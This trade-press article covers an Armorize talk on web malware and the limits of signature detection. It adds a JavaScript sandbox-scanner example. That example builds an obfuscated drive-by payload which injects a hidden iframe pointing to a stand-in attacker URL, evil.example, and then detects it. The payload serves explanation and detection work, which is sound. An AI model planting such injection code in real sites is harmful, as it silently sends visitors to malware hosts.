(WEB HOST INDUSTRY REVIEW) — As attackers deploy increasingly sophisticated attack methods, hosts face a threat that could cost them computing power and customers. Such problems also present opportunities, however: companies can differentiate themselves by offering malware detection.
But there is a danger in trusting malware solutions that rely on traditional tactics, said Armorize chief executive officer Caleb Sima in his Wednesday morning HostingCon presentation, “Conquering Web-based Malware.”
Using the open-source penetration testing framework Metasploit, Sima demonstrated a simple malware attack against a dummy desktop instance to show how easily websites are exploited. Rather than using an obscure site, he used the highly trafficked site Digg as his example. The ever-popular Digg, he said, had a persistent cross-site scripting flaw that redirects users via injected malicious links.
Within the site's code, attackers are able to plant code that appends a link string to create an iframe, which redirects the user to a location unknown to them. In this case, the obfuscated code led visitors to a URL on zcrack.org.
“People say, ‘Don't go to untrusted websites,’” Sima said, “but this is happening on major websites.”
And it doesn't have to be this way. Signature-based detection and behaviour-based detection are each limited for different reasons. Signatures don't matter, Sima said, because attackers can trivially generate new variants, and scanners simply cannot keep up with the millions created each year. Behaviour-based analysis is circumvented in a variety of ingenious ways. “When I started, I was amazed at how ingenious these guys get,” Sima said. Tactics include only serving the malicious script during peak times, and never using the same IP address twice, so that an analyst's or scanner's repeat visit sees a clean page.
The only way to detect this obfuscated code and hidden malware, Sima argued, is to actually load the pages inside a specialized virtual machine that can observe the exploitation as it happens. Using this approach, Armorize scans all of a site's pages and renders them in a sandbox environment, surfacing suspicious behaviour however well the code itself is concealed.
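To make the contrast between the two approaches concrete, here is an added example (not Armorize's code, and not from the talk): a toy "render it and watch" scanner. It builds a constructed sample of the kind of injected payload described above (an iframe assembled from character codes and appended to the page at 1x1 pixels), runs it against an instrumented fake DOM, and reports iframes that point off-site or are hidden. The page origin, the drop URL `evil.example` and the helper names are all assumptions made for the example; the real URL from the talk is not used.

```javascript
// Added example (not Armorize's or the talk's code): a toy "render it and watch"
// scanner. It executes an injected script against an instrumented fake DOM and
// reports iframes that point off-site or are hidden, then contrasts that with a
// plain string-signature check on the same page source.

const PAGE_ORIGIN = "https://example-site.test";      // assumption: the site being scanned
const DROP_URL = "http://evil.example/l.php";         // hypothetical, not the URL from the talk

// Rewrite a literal as String.fromCharCode(...) so it never appears in the page text.
function obfuscate(str) {
  const codes = Array.from(str, (ch) => ch.charCodeAt(0)).join(",");
  return `String.fromCharCode(${codes})`;
}

// Constructed sample of the injected payload the article describes: build an
// iframe from character codes and append it to the page, 1x1 so nobody sees it.
const injectedScript = `
  var u = ${obfuscate(DROP_URL)};
  var f = document.createElement(${obfuscate("iframe")});
  f.setAttribute("src", u);
  f.style.width = "1px";
  f.style.height = "1px";
  document.body.appendChild(f);
`;

// Signature-style detection: does the page source contain any known bad string?
function signatureMatch(source, signatures) {
  return signatures.some((sig) => source.includes(sig));
}

// Minimal instrumented DOM: enough surface for typical drive-by loaders, plus a
// log of every element the script creates.
function makeSandboxDocument(origin) {
  const created = [];
  const makeElement = (tag) => ({
    tagName: tag.toUpperCase(),
    attrs: {},
    style: {},
    children: [],
    setAttribute(name, value) { this.attrs[name] = String(value); },
    appendChild(child) { this.children.push(child); return child; },
  });
  const body = makeElement("body");
  const document = {
    body,
    location: { href: origin + "/" },
    createElement(tag) { const el = makeElement(tag); created.push(el); return el; },
    write(html) { created.push({ tagName: "#DOCUMENT-WRITE", attrs: {}, style: {}, html }); },
  };
  return { document, created };
}

// Run the script with the fake DOM in scope. new Function is NOT isolation (the
// script still sees Node globals); a real scanner drives a browser inside a VM,
// as the article says. This only illustrates the observe-the-behaviour idea.
function runInSandbox(scriptSource, origin) {
  const sb = makeSandboxDocument(origin);
  const win = { location: sb.document.location, document: sb.document };
  try {
    new Function("document", "window", scriptSource)(sb.document, win);
  } catch (e) {
    sb.error = String(e);   // a crashing payload is itself worth reporting
  }
  return sb;
}

function isHidden(el) {
  const w = parseInt(el.style.width || el.attrs.width || "100", 10);
  const h = parseInt(el.style.height || el.attrs.height || "100", 10);
  return el.style.display === "none" || el.style.visibility === "hidden" || w <= 1 || h <= 1;
}

// Behavioural rule: an iframe created at runtime that loads a third-party host
// or is invisible is suspicious regardless of how the script was written.
function findSuspiciousFrames(sandbox, origin) {
  const pageHost = new URL(origin).host;
  const findings = [];
  for (const el of sandbox.created) {
    if (el.tagName !== "IFRAME" || !el.attrs.src) continue;
    let host;
    try { host = new URL(el.attrs.src, origin).host; } catch (e) { host = "(unparseable)"; }
    const hidden = isHidden(el);
    if (host !== pageHost || hidden) findings.push({ src: el.attrs.src, host, hidden });
  }
  return findings;
}

function scanPage(scriptSource, origin, signatures) {
  const sb = runInSandbox(scriptSource, origin);
  return {
    signatureHit: signatureMatch(scriptSource, signatures),
    frames: findSuspiciousFrames(sb, origin),
    error: sb.error || null,
  };
}

const report = scanPage(injectedScript, PAGE_ORIGIN, ["evil.example", "iframe"]);
console.log(JSON.stringify(report, null, 2));
```

Run with `node`: the signature check misses, because neither `evil.example` nor even the word `iframe` appears literally in the obfuscated source, while the sandbox report lists one hidden iframe whose resolved host is `evil.example`. The same rule leaves a visible, same-origin iframe alone. The fake DOM is deliberately tiny; the point is that detection keys on what the script does after it runs, not on what it looks like.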
Japanese firm GMO used Armorize when it decided to launch the first malware-free hosting service. When it launched in 2009, it was wildly successful, out-selling the free SSL and free antivirus options across all of GMO's brands. “Web malware is becoming a differentiator for companies,” Sima said. To this end, Armorize offers API access and a white-label front end so that any hosting provider can differentiate itself on security.